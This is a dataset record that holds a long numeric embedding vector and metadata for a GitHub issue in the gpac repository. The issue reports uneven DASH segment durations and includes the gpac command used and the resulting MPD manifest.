-0.014882529154419899, 0.002032213844358921, -0.009198442101478577, 0.011887687258422375, -0.01068822294473648, -0.00002578466956038028, -0.013415667228400707, -0.0013102431548759341, 0.02284330688416958, -0.013950460590422153, 0.004652700386941433, -0.00014432251919060946, -0.030192891135811806, -0.007838538847863674, -0.007953138090670109, -0.0016845983918756247, 0.021544523537158966, -0.016685545444488525, 0.006856811698526144, -0.002872603014111519, 0.005137833766639233, 0.02597566694021225, -0.004461702890694141, 0.0014601761940866709, 0.020108221098780632, -0.009840193204581738, 0.023760095238685608, -0.020108221098780632, -0.011184816248714924, 0.01720505952835083, 0.011505692265927792, -0.0015871896175667644, 0.010940339416265488, -0.0030941602308303118, -0.03300437703728676, -0.017724571749567986, -0.013660144060850143, 0.01154389139264822, 0.0023931991308927536, 0.004266885109245777, 0.013140630908310413, 0.03282101824879646, 0.005065254867076874, 0.0056382473558187485, -0.011574450880289078, -0.000029395716410363093, 0.005852164700627327, 0.006341118365526199, -0.0167313851416111, -0.016914742067456245, 0.0008881386020220816, 0.026632698252797127, 0.009251921437680721, 0.009274840354919434, -0.006398417986929417, 0.005034695379436016, -0.008686568588018417, -0.004557201638817787, 0.018427442759275436, -0.02076525241136551, 0.0042707049287855625, 0.00733430590480566, 0.027396688237786293, 0.024539364501833916, 0.003451325697824359, 0.005206593312323093, -0.01396574079990387, -0.0150124067440629, -0.0032526880968362093, 0.0007133758044801652, -0.0008967334870249033, 0.02909274585545063, 0.009305400773882866, -0.00637549813836813, 0.0045610214583575726, 0.009733234532177448, 0.017159219831228256, -0.009190801531076431, -0.022598829120397568, -0.00026429284480400383, -0.0014162467559799552, -0.002249951008707285, 0.013492066413164139, 0.0077010211534798145, -0.033401649445295334, 0.002311070216819644, -0.013247589580714703, 0.016823064535856247, -0.015784036368131638, -0.018259365111589432, 0.007112748455256224, 0.012193283066153526, 0.004767298698425293, 0.014836689457297325, -0.002805753843858838, -0.0036232233978807926, 0.0038256808184087276, 0.003691982477903366, 0.010428465902805328, 0.02713693119585514, -0.03783279284834862, 0.0065282960422337055, -0.0003965586656704545, -0.0024543185718357563, -0.009259561076760292, -0.010451385751366615, -0.016089633107185364, 0.0062112403102219105, 0.0003523904597386718, -0.003753101686015725, -0.009435278363525867, 0.0016062894137576222, -0.002385559258982539, -0.020367978140711784, 0.0006641939398832619, 0.008992164395749569, -0.004171386361122131, -0.015226324088871479, 0.02296554483473301, 0.018519122153520584, 0.007326665800064802, -0.020505497232079506, 0.008358052931725979, -0.025593671947717667, 0.01103201787918806, 0.0045037223026156425, 0.00929776020348072, -0.007639901712536812, 0.003111350117251277, 0.010932699777185917, 0.007914938032627106, 0.011780728586018085, -0.017984328791499138, 0.0019061554921790957, -0.004637420177459717, 0.005859804805368185, -0.0014105169102549553, 0.011582091450691223, -0.03138471767306328, 0.004736739210784435, -0.00016342227172572166, -0.01729673705995083, 0.0025536371394991875, -0.00906092394143343, -0.010978538542985916, -0.0007888198597356677, 0.016884183511137962, -0.003592663910239935, -0.018488561734557152, 0.0016702734865248203, 0.014118538238108158, 0.0013818672159686685, -0.0016263440484181046, 0.03624369576573372, 0.002141082426533103, -0.005118734203279018, -0.01729673705995083, 0.008174695074558258, -0.008182334713637829, 0.017342576757073402, -0.007055449299514294, 0.006795692723244429, -0.015577759593725204, 0.007720120716840029, 0.0035334546118974686, -0.0003213533782400191, -0.01286559458822012, 0.004912456963211298, -0.011459852568805218, 0.001319793052971363, 0.00045743913506157696, 0.028680192306637764, 0.011971726082265377, 0.016578586772084236, 0.005615327972918749, -0.0016750484937801957, -0.0018469463102519512, -0.014913088642060757, 0.004289804957807064, -0.0094658387824893, -0.0015069706132635474, 0.006474816706031561, -0.0033634668216109276, -0.005153113976120949, 0.002956642070785165, 0.014592212624847889, 0.003728272160515189, -0.004580121021717787, -0.004133186768740416, -0.020291579887270927, -0.015256883576512337, 0.00779651990160346, 0.01142165344208479, -0.008869926445186138, -0.005382311064749956, -0.00390971964225173, 0.007540583144873381, -0.009320680052042007, 0.009038004092872143, 0.002068503526970744, -0.015906276181340218, -0.02460048347711563, 0.009496398270130157, -0.03291269764304161, 0.010955619625747204, 0.01333926897495985, 0.031812552362680435, -0.006455717142671347, -0.010306227952241898, 0.004247785545885563, 0.02768700383603573, 0.01663970574736595, -0.031476397067308426, -0.0002561754663474858, 0.013660144060850143, -0.00181065674405545, -0.006237979978322983, 0.004519002046436071, -0.019680386409163475, 0.0073304856196045876, 0.01731201820075512, 0.007945497520267963, 0.010168708860874176, 0.001955814892426133, -0.01437829528003931, 0.013514986261725426, -0.005168393719941378, -0.02550199255347252, -0.011620290577411652, -0.001650218851864338, 0.005810145288705826, 0.016807783395051956, 0.009320680052042007, 0.009916592389345169, 0.02322530187666416, -0.003416946157813072, -0.005493089556694031, -0.011414012871682644, 0.014095619320869446, -0.008915765210986137, -0.02516583725810051, -0.001605334342457354, -0.0003650440485216677, 0.013866421766579151, 0.007414524909108877, -0.03508242964744568, -0.019817905500531197, 0.0012013745727017522, -0.024279607459902763, -0.03230150416493416, 0.004709999542683363, 0.022094596177339554, -0.0010552614694461226, -0.014347735792398453, -0.012040485627949238, 0.009633916430175304, 0.005099634639918804, 0.009824913926422596, 0.02100973017513752, 0.007265546824783087, -0.001207104534842074, 0.019466469064354897, -0.009824913926422596, -0.015020047314465046, 0.005982043221592903, -0.01171960961073637, -0.006509196478873491, -0.014951287768781185, 0.010894499719142914, 0.03138471767306328, -0.007490923628211021, -0.014974207617342472, -0.026372941210865974, -0.0051607536152005196, 0.0058712647296488285, 0.03578529879450798, 0.0032927975989878178, -0.0006560765905305743, 0.005263892468065023, -0.007292286492884159, 0.004870437551289797, -0.0000393037153116893, 0.004935376346111298, 0.004633600357919931, -0.026342380791902542, 0.022339072078466415, 0.01787737011909485, 0.002206021687015891, -0.01194116659462452, 0.007838538847863674, -0.007479463703930378, -0.0077583203092217445, 0.0126363979652524, -0.02123892679810524, -0.005168393719941378, -0.0013159731170162559, 0.009947151876986027, -0.027900921180844307, -0.01699114218354225, 0.018641360104084015, 0.02366841584444046, -0.0038065810222178698, -0.02505887858569622, 0.012048125267028809, -0.00473291939124465, 0.015386762097477913, -0.0177856907248497, 0.0341656394302845, 0.004228685516864061, 0.012155083939433098, -0.018305204808712006, -0.013132991269230843, -0.007403064984828234, -0.000539568078238517, 0.015845157206058502, 0.0026204863097518682, 0.012544718571007252, -0.017739852890372276, 0.0022136615589261055, -0.04131658747792244, -0.0010409366805106401, 0.00027766267885454, 0.004274525213986635, -0.005030875559896231, -0.0006236069602891803, 0.00534411147236824, -0.005596227943897247, -0.019420631229877472, 0.006539755966514349, 0.0030005713924765587, 0.015982674434781075, -0.015615959651768208, -0.0007162407855503261, 0.014363015070557594, -0.01569235883653164, -0.014385934919118881, -0.016700824722647667, 0.017602333799004555, -0.014821409247815609, 0.012537078931927681, -0.0018822808051481843, 0.0038256808184087276, -0.01466861180961132, -0.005974403116852045, 0.02437128685414791, -0.010756981559097767, 0.006451896857470274, 0.01154389139264822, 0.003290887689217925, 0.002549817319959402, 0.009832553565502167, -0.011551531963050365, 0.017709292471408844, -0.019115034490823746, 0.01500476710498333, -0.014431774616241455, 0.008625449612736702, 0.003309987485408783, 0.00005888096347916871, -0.03337109088897705, -0.005764306057244539, -0.0052409726195037365, 0.00848793052136898, -0.005959123373031616, -0.003819950856268406, -0.018656639382243156, 0.005535108968615532, -0.004797858186066151, 0.0021754619665443897, -0.008419171907007694, 0.011398733593523502, -0.02056661620736122, -0.005852164700627327, -0.013423307798802853, 0.00672311382368207, 0.022552989423274994, 0.010756981559097767, -0.024325447157025337, -0.006971410475671291, -0.011673769913613796, 0.014462334103882313, 0.016471628099679947, 0.013201750814914703, 0.0030827003065496683, 0.013354548253118992, 0.019603988155722618, -0.005091994535177946, 0.00785381905734539, -0.013958100229501724, 0.01926783286035061, -0.006814792286604643, 0.0007974147447384894, -0.009954792447388172, 0.029642818495631218, 0.0068682716228067875, 0.01939007081091404, 0.005405230447649956, -0.00998535193502903, -0.021972358226776123, -0.002419938798993826, 0.0012271592859178782, -0.007368685211986303, 0.00865600910037756, -0.008732407353818417, -0.004752018954604864, 0.0040988074615597725, -0.004782578442245722, -0.022354353219270706, -0.0026319462340325117, -0.03312661498785019, -0.010963259264826775, 0.0002626216155476868, 0.001685553346760571, 0.002700705314055085, 0.01356846559792757, -0.003483795328065753, 0.009519318118691444, -0.010772261768579483, 0.005603868048638105, 0.0024352187756448984, -0.011589731089770794, -0.00209333305247128, -0.006444257218390703, 0.009251921437680721, -0.017266178503632545, -0.002144902478903532, 0.01165085006505251, -0.01651746779680252, -0.004637420177459717, 0.00209333305247128, -0.007777419872581959, 0.002895522862672806, -0.014233137480914593, 0.028924668207764626, 0.00023039078223519027, -0.024768561124801636, -0.009847833774983883, -0.005687906872481108, 0.004748199135065079, -0.003306167433038354, -0.01084102038294077, -0.0005844524712301791, -0.015424962155520916, 0.00041971710743382573, 0.027671724557876587, 0.012246762402355671, -0.024401847273111343, -0.015753477811813354, -0.01161265093833208, -0.009144962765276432, -0.0011822747765108943, -0.0034857052378356457, -0.005867444444447756, 0.0030158511362969875, -0.0066161551512777805, 0.03150695562362671, -0.031323596835136414, 0.023133622482419014, -0.0016979682259261608, 0.02330170013010502, 0.02298082411289215, -0.02609790489077568, 0.003470425494015217, 0.02250715158879757, -0.009374159388244152, 0.021880678832530975, 0.005833065137267113, 0.011253575794398785, 0.019894303753972054, 0.01926783286035061, -0.019084474071860313, -0.026128463447093964, 0.004194306209683418, 0.014256056398153305, 0.015493720769882202, -0.01120773609727621, -0.008044816553592682, 0.009947151876986027, 0.00744890421628952, 0.0024218489415943623, -0.000013429515092866495, 0.0028324935119599104, -0.001396192004904151, -0.016884183511137962, 0.022568270564079285, -0.007269366644322872, 0.020597174763679504, -0.007315205875784159, 0.0058712647296488285, -0.02111668884754181, -0.007024889811873436, -0.004599221050739288, -0.022446030750870705, -0.008411532267928123, -0.01212452445179224, 0.009144962765276432, 0.012590558268129826, -0.0008298843167722225, -0.018763598054647446, -0.001986374380066991, -0.015577759593725204, -0.008296933025121689, 0.023683695122599602, -0.0025727369356900454, 0.0001665259915171191, 0.0054434300400316715, -0.00418666610494256, -0.00008189019717974588, -0.0033271771389991045, 0.008296933025121689, -0.0163799487054348, 0.007735400460660458, 0.017724571749567986, -0.01650218851864338, 0.0022575908806174994, -0.01217036321759224, 0.000028500415282906033, -0.010879220440983772, 0.009412359446287155, 0.0037359120324254036, -0.01062710303813219, -0.002343539847061038, 0.00784617941826582, -0.0023970191832631826, 0.004614500794559717, -0.009343599900603294, 0.03312661498785019, -0.001001782133243978, -0.0003256508207414299, 0.011238295584917068, 0.005145473871380091, -0.008847006596624851, -0.030911043286323547, 0.0023874694015830755, 0.007055449299514294, 0.002815303858369589, 0.015272163785994053, -0.01010758988559246, 0.010657663457095623, 0.008724767714738846, 0.02180428057909012, -0.008625449612736702, 0.0057261064648628235, -0.00556566845625639, 0.010038831271231174, 0.010459025390446186, -0.0018039718270301819, 0.01570763811469078, 0.014003939926624298, 0.027198050171136856, -0.007403064984828234, 0.007624621968716383, -0.004805498290807009, 0.00692939106374979, -0.008465011604130268, 0.012521798722445965, 0.028710750862956047, -0.02111668884754181, -0.009748514741659164, -0.00865600910037756, -0.026372941210865974, 0.00992423202842474, 0.014997127465903759, 0.006833892315626144, -0.024172648787498474, 0.00392308970913291, 0.008564329706132412, -0.018274644389748573, 0.009419999085366726, 0.0003886799968313426, -0.008839366026222706, -0.019833184778690338, 0.007074548862874508, -0.006058441940695047, -0.0050461553037166595, -0.0048131379298865795, -0.006994330324232578, 0.01563887856900692, -0.012361360713839531, 0.004259245470166206, -0.020367978140711784, 0.00003048499820579309, -0.009007444605231285, 0.01518812496215105, -0.006295279134064913, 0.0208722110837698, -0.004289804957807064, 0.020016543567180634, 0.019313672557473183, -0.017036981880664825, -0.0150124067440629, -0.00895396526902914, 0.01022218819707632, 0.02469216287136078, -0.001364677445963025, -0.0008690388058312237, -0.0004970711306668818, 0.014332455582916737, 0.0003712514881044626, -0.013828222639858723, 0.00958043709397316, 0.004767298698425293, 0.015256883576512337, 0.002419938798993826, -0.019008075818419456, -0.006054622121155262, 0.005061435047537088, -0.0076437219977378845, -0.0025211675092577934, 0.018213525414466858, -0.0018163867061957717, 0.008969244547188282, 0.002763734431937337, 0.02136116474866867, -0.0060737221501767635, 0.027121651917696, 0.005974403116852045, -0.010772261768579483, 0.02319474145770073, -0.018870556727051735, -0.02241547219455242, 0.0038314107805490494, 0.009397079236805439, -0.007223526947200298, -0.006562675815075636, -0.0007892973371781409, -0.0303762499243021, -0.009931872598826885, 0.01755649410188198, 0.012674597091972828, -0.014531093649566174, 0.026632698252797127, -0.017174499109387398, -0.017984328791499138, -0.016364669427275658, -0.0030215810984373093, 0.00389825995080173, -0.012193283066153526, -0.023271141573786736, -0.02516583725810051, -0.006360218394547701, 0.008167055435478687, -0.011291774921119213, -0.013178830966353416, -0.01397338043898344, 0.004797858186066151, 0.012407200410962105, -0.014676251448690891, 0.014813769608736038, 0.00432800455018878, 0.004519002046436071, 0.003669062862172723, -0.005179853644222021, -0.01928311213850975, -0.0012453040108084679, -0.010015911422669888, -0.0002506842720322311, 0.005332651548087597, 0.022461311891674995, 0.010535424575209618, 0.013644864782691002, -0.03254598006606102, -0.016471628099679947, -0.013224669732153416, -0.02250715158879757, 0.008243453688919544, 0.01803016848862171, -0.0006212195148691535, -0.0006794737419113517, 0.014737370423972607, 0.007689561229199171, -0.0010800911113619804, 0.027748122811317444, 0.005034695379436016, 0.0025517272297292948, -0.0023168001789599657, -0.01916087418794632, 0.0029719218146055937, 0.011467492207884789, -0.01061946339905262, 0.012621117755770683, 0.026281261816620827, -0.013362187892198563, 0.02803844027221203, -0.01541732158511877, 0.01720505952835083, -0.0004519479407463223, -0.0185802411288023, 0.0015079255681484938, -0.005752846132963896, -0.006627614609897137, 0.015241604298353195, -0.0036843426059931517, -0.0076933810487389565, 0.017862090840935707, 0.00698669021949172, -0.008678928017616272, 0.012407200410962105, -0.0012414840748533607, -0.02088749222457409, 0.004759659059345722, 0.007563502993434668, -0.03175143152475357, 0.013140630908310413, 0.004912456963211298, 0.0022041117772459984, -0.004759659059345722, 0.0037798413541167974, 0.029826177284121513, -0.0022518611513078213, 0.01708281971514225, 0.0005156933912076056, 0.01641050912439823, -0.021269487217068672, 0.0019672748167067766, 0.0005300181801430881, 0.00444260286167264, -0.0017438075738027692, 0.003942189272493124, 0.01706754043698311, -0.003097980283200741, 0.017617613077163696, -0.006833892315626144, 0.000009176835192192812, -0.027870362624526024, 0.006016422528773546, -0.005798685364425182, -0.02343921922147274, -0.0009931871900334954, -0.02849683351814747, -0.0013178830267861485, -0.0009731324971653521, -0.03025401197373867, 0.005409050267189741, -0.009641556069254875, -0.0062456196174025536, 0.0049812160432338715, 0.0002654865966178477, -0.01951230876147747, 0.014653331600129604, 0.003586933948099613, -0.00020842607773374766, -0.0035792940761893988, -0.012376640923321247, -0.010153429582715034, 0.00209333305247128, -0.002895522862672806, -0.02495191991329193, 0.009565156884491444, -0.00808301568031311, -0.0015680898213759065, -0.005978223402053118, -0.019542869180440903, -0.009687395766377449, 0.0038027612026780844, -0.01787737011909485, 0.013308708555996418, 0.012605837546288967, -0.011513331905007362, -0.03844398632645607, 0.022537710145115852, 0.0025727369356900454, 0.011910607106983662, -0.003900169860571623, -0.005936203524470329, -0.008717128075659275, 0.005962943192571402, 0.01708281971514225, 0.007689561229199171, 0.01916087418794632, -0.013981020078063011, -0.004664159845560789, 0.037466078996658325, -0.006352578289806843, 0.010886860080063343, 0.0016301641007885337, 0.013285789638757706, 0.0077506802044808865, -0.01882471889257431, 0.005554208531975746, 0.00070287095149979, -0.00597058329731226, -0.0099929915741086, 0.00796841736882925, -0.011902967467904091, 0.001737122656777501, -0.011559171602129936, -0.012216202914714813, -0.008984524756669998, 0.007574962452054024, 0.0076933810487389565, 0.010252748616039753, -0.012796835973858833, 0.010344427078962326, 0.008785886690020561, 0.006165400613099337, 0.006046982482075691, 0.0034398657735437155, -0.018641360104084015, 0.019069194793701172, -0.00980963371694088, -0.007078369148075581, -0.018137127161026, -0.03963581100106239, 0.012957273051142693, -0.005756665952503681, 0.004973575938493013, -0.006681093946099281, -0.010955619625747204, 0.0014372565783560276, -0.0028592331800609827, -0.009435278363525867, 0.013545545749366283, 0.023164182901382446, 0.023362819105386734, -0.005134013947099447, -0.02586870826780796, -0.012827395461499691, 0.004694719798862934, 0.00611956138163805, 0.0066161551512777805, 0.00331953726708889, 0.0030330410227179527, -0.019573427736759186, -0.011880047619342804, -0.003092250321060419, -0.01641050912439823, -0.0076437219977378845, 0.00048394003533758223, -0.01194880623370409, -0.025089437142014503, 0.007869099266827106, 0.016670266166329384, 0.011467492207884789, 0.008090656250715256, 0.014638052321970463, 0.005416690371930599, -0.004874257370829582, -0.002706435276195407, -0.010779901407659054, 0.007689561229199171, -0.02123892679810524, 0.011070217937231064, -0.031216638162732124, 0.012193283066153526, -0.005577128380537033, -0.009236641228199005, -0.007792700082063675, -0.012506519444286823, 0.006348758470267057, 0.0016463987994939089, 0.01592155545949936, -0.014515813440084457, 0.018182966858148575, -0.008808806538581848, 0.005833065137267113, -0.017266178503632545, 0.014943648129701614, 0.0072731864638626575, 0.0025116177275776863, 0.0009349329629912972, -0.018901117146015167, 0.00043810062925331295, -0.008457371033728123, -0.010206908918917179, 0.02067357487976551, -0.010092310607433319, 0.0016196591313928366, -0.00042783451499417424, 0.013927540741860867, -0.025349194183945656, 0.012040485627949238, 0.021300045773386955, 0.019879024475812912, -0.013629584573209286, -0.0027560945600271225, 0.00540141062811017, 0.0056688073091208935, -0.01722033880650997, -0.035846419632434845, 0.00940471887588501, -0.004587761126458645, -0.012139803729951382, 0.008839366026222706, 0.01552428025752306, -0.02388233318924904, -0.005431970115751028, 0.013981020078063011, -0.004767298698425293, 0.010161069221794605, -0.013820582069456577, 0.012995473109185696, 0.026067344471812248, 0.0011316604213789105, -0.014003939926624298, -0.0026930654421448708, 0.021559802815318108, 0.020016543567180634, 0.007571142632514238, 0.004782578442245722, -0.008755327202379704, 0.010443746112287045, -0.0019147504353895783, 0.012475959956645966, 0.0094658387824893, -0.003949829377233982, -0.005867444444447756, -0.011077857576310635, -0.005275352392345667, -0.0027847441378980875, 0.004946836270391941, 0.015860436484217644, 0.007815619930624962, 0.017250899225473404, -0.009144962765276432, 0.0018211615970358253, -0.008518490940332413, -0.0144852539524436, -0.005878904368728399, 0.029276104643940926, -0.0070936488918960094, 0.022598829120397568, 0.012796835973858833, -0.004786398261785507, 0.00658177537843585, -0.00606226222589612, -0.002095242962241173, -0.025226956233382225, 0.009939512237906456, 0.01812184788286686, 0.006860631983727217, 0.025226956233382225, -0.012964913621544838, -0.005210413131862879, 0.02515055611729622, 0.005340291187167168, 0.01120009645819664, 0.013560825958848, 0.006100461818277836, -0.004056788049638271, -0.0033367271535098553, 0.004278345033526421, 0.011666130274534225, -0.007464183960109949, -0.0303762499243021, -0.015661798417568207, -0.004774938803166151, -0.0007315205875784159, 0.01478321012109518, 0.01101673860102892, -0.0066658142022788525, -0.022140435874462128, -0.0013140630908310413, -0.0000580453488510102, -0.01722033880650997, 0.03599921613931656, 0.0017552674980834126, 0.014592212624847889, -0.032026469707489014, -0.015203404240310192, -0.001954859821125865, 0.012185643427073956, -0.013056592084467411, 0.013851141557097435, 0.012445400469005108, 0.007170048076659441, 0.008426811546087265, -0.012689877301454544, -0.005416690371930599, -0.010947979055345058, 0.004148466512560844, 0.005917103961110115, -0.0002411344030406326, 0.002282420638948679, -0.004935376346111298, -0.017816251143813133, -0.0007267456385307014, -0.020047102123498917, -0.003672882914543152, -0.005978223402053118, -0.007930218242108822, -0.025700630620121956, -0.01894695684313774, -0.015394401736557484, -0.005271532107144594, -0.010550704784691334, -0.01663970574736595, 0.0054357899352908134, -0.02148340456187725, -0.019435910508036613, 0.0035468244459480047, 0.004935376346111298, -0.007571142632514238, -0.016334110870957375, -0.0010380716994404793, -0.003544914536178112, -0.013492066413164139, 0.0003426018520258367, -0.0005032785120420158, 0.0012567638186737895, 0.007792700082063675, -0.004312724806368351, -0.016456348821520805, 0.00022704833827447146, -0.018213525414466858, -0.0008246318902820349, 0.02391289360821247, -0.014049779623746872, 0.006631434895098209, 0.01379002258181572, -0.006054622121155262, 0.006971410475671291, 0.007269366644322872, -0.00796841736882925, -0.011811288073658943, -0.0015260704094544053, 0.008113576099276543, 0.016120193526148796, -0.00355064426548779, 0.010260388255119324, 0.006784232798963785, 0.004465522710233927, 0.004824597854167223, 0.009863113053143024, 0.021147247403860092, -0.0159368347376585, 0.013958100229501724, 0.02574646845459938, 0.02886354923248291, -0.01212452445179224, 0.009794354438781738, 0.018442723900079727, 0.004469342529773712, -0.01984846405684948, -0.008633089251816273, 0.020918050780892372, 0.0026032966561615467, 0.005821605212986469, 0.004331824369728565, -0.017357856035232544, -0.02123892679810524, 0.0104361055418849, 0.01754121482372284, 0.005626787897199392, 0.005290632136166096, -0.0006446167244575918, 0.021850118413567543, -0.01132233440876007, 0.003352006897330284, 0.008037176914513111, 0.016074353829026222, 0.020062381401658058, 0.00802953727543354, 0.011841847561299801, -0.025563111528754234, 0.0029432722367346287, 0.011925886385142803, -0.010703502222895622, -0.009007444605231285, -0.0076704612001776695, -0.0007692425861023366, -0.0008762012585066259, -0.005359391216188669, -0.02321002259850502, 0.002188831800594926, -0.05231804773211479, 0.009725594893097878, 0.013079511933028698, 0.009771434590220451, 0.01803016848862171, 0.02435600757598877, 0.013644864782691002, -0.005011775530874729, 0.0004361906321719289, -0.010886860080063343, 0.005676446948200464, -0.0045533813536167145, 0.004992675967514515, -0.019879024475812912, -0.003277517855167389, 0.014172017574310303, 0.0026930654421448708, 0.05552680790424347, 0.004767298698425293, -0.00710128853097558, 0.009771434590220451, -0.013285789638757706, -0.014363015070557594, -0.0029146226588636637, -0.02321002259850502, -0.0046985396184027195, -0.000892436015419662, -0.009870752692222595, 0.014951287768781185, -0.004331824369728565, -0.01939007081091404, 0.00047080894000828266, 0.010756981559097767, 0.0011994645465165377, 0.004331824369728565, -0.005825425032526255, -0.0031705591827630997, -0.009267200715839863, -0.0024925179313868284, 0.008709488436579704, 0.0018240265781059861, 0.016211871057748795, -0.016563307493925095, 0.016532747074961662, -0.01518048532307148, 0.021666761487722397, -0.02791620045900345, 0.013988660648465157, 0.003907809965312481, 0.011780728586018085, -0.0037798413541167974, 0.01799960806965828, 0.022079316899180412, -0.024417126551270485, 0.022216834127902985, 0.004469342529773712, -0.02134588547050953, 0.007594062481075525, 0.016120193526148796, -0.0016511738067492843, 0.00040300481487065554, 0.005122554022818804, 0.0025861067697405815, -0.0244782455265522, -0.0043012648820877075, -0.006558855529874563, -0.0032756079453974962, -0.014745010063052177, 0.01741897687315941, -0.010367346927523613, 0.004366203676909208, 0.01972622610628605, -0.015088805928826332, 0.004763478878885508, -0.01812184788286686, -0.0012013745727017522, -0.0026052065659314394, -0.02631182223558426, -0.008159414865076542, -0.001778187113814056, 0.00577194569632411, -0.01518812496215105, 0.007510023657232523, 0.026174303144216537, 0.016013234853744507, -0.006364038214087486, 0.0064136977307498455, -0.0021620921324938536, 0.0022365811746567488, 0.001197554636746645, 0.009099123068153858, 0.009313040412962437, -0.007624621968716383, 0.02273634821176529, -0.0032125788275152445, 0.003569744061678648, -0.0017008330905809999, -0.005485449451953173, -0.024447685107588768, -0.006134841125458479, 0.0013121531810611486, -0.005206593312323093, 0.0026510460302233696, 0.006799512542784214, -0.003040680894628167, -0.00704398937523365, 0.014156738296151161, -0.006822432391345501, 0.006306739058345556, -0.015233964659273624, -0.012223842553794384, -0.0068186125718057156, 0.007559682708233595, 0.011857127770781517, 0.02145284414291382, 0.009259561076760292, 0.005993503145873547, -0.017617613077163696, -0.006852991878986359, -0.011987006291747093, -0.014355375431478024, -0.016563307493925095, -0.003588843857869506, -0.02261411026120186, -0.02562423050403595, -0.022323792800307274, -0.014645691961050034, -0.008740047924220562, 0.013958100229501724, -0.013537906110286713, 0.0011765449307858944, -0.012086324393749237, -0.007601702120155096, -0.0035200847778469324, 0.0018526761559769511, 0.0036385031417012215, -0.014523453079164028, -0.005745206028223038, -0.005137833766639233, 0.005156933795660734, 0.011444573290646076, 0.01581459678709507, -0.0026204863097518682, 0.01891639642417431, 0.024661602452397346, 0.019894303753972054, -0.003464695531874895, 0.01032914686948061, -0.007219707127660513, 0.006283819209784269, 0.012284962460398674, 0.0035678341519087553, 0.019252551719546318, 0.0076933810487389565, -0.015318003483116627, 0.010023551061749458, 0.004209585953503847, -0.0167313851416111, 0.034104522317647934, -0.012292602099478245, 0.02541031315922737, -0.012850315310060978, 0.00617686053737998, -0.02469216287136078, -0.013201750814914703, -0.0006083271582610905, -0.009565156884491444, 0.02159036323428154, -0.0060660820454359055, 0.02907746657729149, -0.005229512695223093, -0.002725535072386265, 0.008396252058446407, 0.006681093946099281, 0.013805302791297436, -0.00987839326262474, 0.009565156884491444, -0.006115741562098265, -0.009045643731951714, -0.01764817349612713, 0.009687395766377449, 0.017480095848441124, 0.009045643731951714, 0.013377468101680279, -0.010145789943635464, 0.008319852873682976, 0.008694208227097988, 0.003245048224925995, -0.007582602556794882, 0.0013589474838227034, -0.009320680052042007, 0.02365313656628132, 0.020459657534956932, 0.010749341920018196, -0.005940023809671402, 0.01437829528003931, 0.016349390149116516, 0.001345577766187489, 0.014408854767680168, -0.0286190714687109, 0.0048933569341897964, -0.001319793052971363, 0.015111725777387619, -0.021788999438285828, 0.0034093062859028578, 0.017510654404759407, 0.008694208227097988, 0.017495375126600266, -0.02400457113981247, 0.007143308408558369, 0.009030363522469997, -0.004114087205380201, 0.0131635507568717, 0.005042335018515587, 0.0023740995675325394, 0.006562675815075636, -0.02287386544048786, 0.003277517855167389, -0.02229323424398899, -0.010481945239007473, 0.005848344881087542 ]
1,669
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
http://dash.akamaized.net/WAVE/Mezzanine/tos_A1_480x270@15_60.mp4 ``` gpac -graph -i ../content_files/tos_A1_480x270@15_60.mp4:noedit @ ffsws:osize=480x270 @ enc:c=h264:b=300k:r=60:color_primaries=1:color_trc=1:colorspace=1:FID=V7 -o output/gpac/stream.mpd:cmaf=cmfc:stl:segdur=2:profile=live:SID=V7 ``` Output MPD: ``` <?xml version="1.0"?> <!-- MPD file Generated with GPAC version 1.1.0-DEV-rev697-g29031a5e6-buildbot-cmaf-dash-profile at 2021-04-12T15:51:21.909Z --> <MPD xmlns="urn:mpeg:dash:schema:mpd:2011" minBufferTime="PT2.000S" type="static" mediaPresentationDuration="PT0H1M0.133S" maxSegmentDuration="PT0H0M2.734S" profiles="urn:mpeg:dash:profile:full:2011,urn:mpeg:dash:profile:cmaf:2019"> <ProgramInformation moreInformationURL="http://gpac.io"> <Title>stream.mpd generated by GPAC</Title> </ProgramInformation> <Period duration="PT0H1M0.133S"> <AdaptationSet segmentAlignment="true" maxWidth="480" maxHeight="270" maxFrameRate="15" par="16:9" lang="und" startWithSAP="3"> <SegmentTemplate media="tos_A1_480x270@15_60_dash$Time$.m4s" initialization="tos_A1_480x270@15_60_dashinit.mp4" timescale="15360" presentationTimeOffset="2048" startNumber="1"> <SegmentTimeline> <S t="0" d="31744"/> <S d="30720" r="13"/> <S d="41984"/> <S d="30720" r="11"/> <S d="23552"/> <S d="27648"/> </SegmentTimeline> </SegmentTemplate> <Representation id="1" mimeType="video/mp4" codecs="avc1.640015" width="480" height="270" frameRate="15" sar="1:1" bandwidth="300000"> </Representation> </AdaptationSet> </Period> </MPD> ``` Same with and without ```:noedit```.
dasher: intermittent issue with segment durations
https://api.github.com/repos/gpac/gpac/issues/1742/comments
1
2021-04-12T15:52:19
2021-04-13T09:01:27Z
https://github.com/gpac/gpac/issues/1742
856,115,373
1,742
false
This is a GitHub Issue repo:gpac owner:gpac Title : dasher: intermittent issue with segment durations Issue date: --- start body --- http://dash.akamaized.net/WAVE/Mezzanine/tos_A1_480x270@15_60.mp4 ``` gpac -graph -i ../content_files/tos_A1_480x270@15_60.mp4:noedit @ ffsws:osize=480x270 @ enc:c=h264:b=300k:r=60:color_primaries=1:color_trc=1:colorspace=1:FID=V7 -o output/gpac/stream.mpd:cmaf=cmfc:stl:segdur=2:profile=live:SID=V7 ``` Output MPD: ``` <?xml version="1.0"?> <!-- MPD file Generated with GPAC version 1.1.0-DEV-rev697-g29031a5e6-buildbot-cmaf-dash-profile at 2021-04-12T15:51:21.909Z --> <MPD xmlns="urn:mpeg:dash:schema:mpd:2011" minBufferTime="PT2.000S" type="static" mediaPresentationDuration="PT0H1M0.133S" maxSegmentDuration="PT0H0M2.734S" profiles="urn:mpeg:dash:profile:full:2011,urn:mpeg:dash:profile:cmaf:2019"> <ProgramInformation moreInformationURL="http://gpac.io"> <Title>stream.mpd generated by GPAC</Title> </ProgramInformation> <Period duration="PT0H1M0.133S"> <AdaptationSet segmentAlignment="true" maxWidth="480" maxHeight="270" maxFrameRate="15" par="16:9" lang="und" startWithSAP="3"> <SegmentTemplate media="tos_A1_480x270@15_60_dash$Time$.m4s" initialization="tos_A1_480x270@15_60_dashinit.mp4" timescale="15360" presentationTimeOffset="2048" startNumber="1"> <SegmentTimeline> <S t="0" d="31744"/> <S d="30720" r="13"/> <S d="41984"/> <S d="30720" r="11"/> <S d="23552"/> <S d="27648"/> </SegmentTimeline> </SegmentTemplate> <Representation id="1" mimeType="video/mp4" codecs="avc1.640015" width="480" height="270" frameRate="15" sar="1:1" bandwidth="300000"> </Representation> </AdaptationSet> </Period> </MPD> ``` Same with and without ```:noedit```. --- end body ---
1,815
